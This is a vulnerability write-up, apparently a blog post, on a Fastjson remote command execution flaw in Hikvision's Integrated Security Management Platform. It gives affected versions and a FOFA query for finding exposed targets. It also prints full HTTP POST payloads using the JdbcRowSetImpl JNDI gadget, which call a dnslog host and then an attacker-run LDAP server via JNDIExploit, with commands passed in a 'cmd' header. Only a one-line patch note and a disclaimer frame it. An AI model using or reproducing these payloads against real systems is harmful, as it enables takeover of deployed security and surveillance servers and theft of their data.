Hikvision Integrated Security Management Platform Fastjson Remote Command Execution Vulnerability
Disclaimer: Do not use the relevant technologies in this article to engage in illegal testing. Any direct or indirect consequences and losses caused by the dissemination and use of the information or tools provided in this article shall be borne by the user himself. Adverse consequences have nothing to do with the article author. This article is for educational purposes only.
1. Brief Introduction of Hikvision Integrated Security Management Platform
The comprehensive security management platform is designed based on the concept of "unified software technology architecture" and adopts business component technology to meet the elastic expansion of the platform in terms of business. The platform is applicable to the general comprehensive security business of the whole industry. It integrates and centrally manages the resources of each system, and realizes unified deployment, configuration, management and scheduling.
2. Vulnerability description
Hikvision’s comprehensive security management platform has a Fastjson remote command execution vulnerability, which can execute system commands and obtain system permissions and sensitive data information of the target server.
Three, the impact version
V2.0.0 <= iVMS-8700 <= V2.9.2
V1.0.0 <= iSecure Center <= V1.7.0
4. Vulnerability recurrence
FOFA: app="HIKVISION-Comprehensive Security Management Platform"
The vulnerability data package is as follows:
POST /bic/ssoService/v1/applyCT HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Connection: close
Host: 127.0.0.1
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Te: trailers
Content-Type: application/json
Content-Length: 196
{
"a":{
"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://xxx.dnslog.cn","autoCommit":true},"hfe4zyyzldp":"="}
First, test whether ldap can execute dnslog to echo. If the request can be received, there is a high probability that there is a command execution vulnerability.
Xiaolong POC One-click Hara Less
Xiaolong POC Portal: Xiaolong POC tool
After confirming that dnslog can receive the request, it can be further used. Use the JNDIExploit-1.3-SNAPSHOT.jar tool to execute the following command
Tool download address: JNDIExploit
java -jar JNDIExploit-1.4-SNAPSHOT.jar -i ip
Then add fields to the header of Burp’s request packet. cmd: whoami
Here, cmd can execute system commands. In the payload below, change ldap to your VPSip/Basic/TomcatEcho, as follows:
POST /bic/ssoService/v1/applyCT HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Connection: keep-alive
Host: 127.0.0.1
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Te: trailers
Content-Type: application/json
cmd: whoami
Content-Length: 215
{
"a":{
"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://公网服务器ip地址:1389/Basic/TomcatEcho","autoCommit":true},"hfe4zyyzldp":"="}
Burp puts the package and executes
the command execution successfully! ! !
5. Repair plan
At present, the manufacturer provides repair patches, please go to the official website to download the corresponding version patches.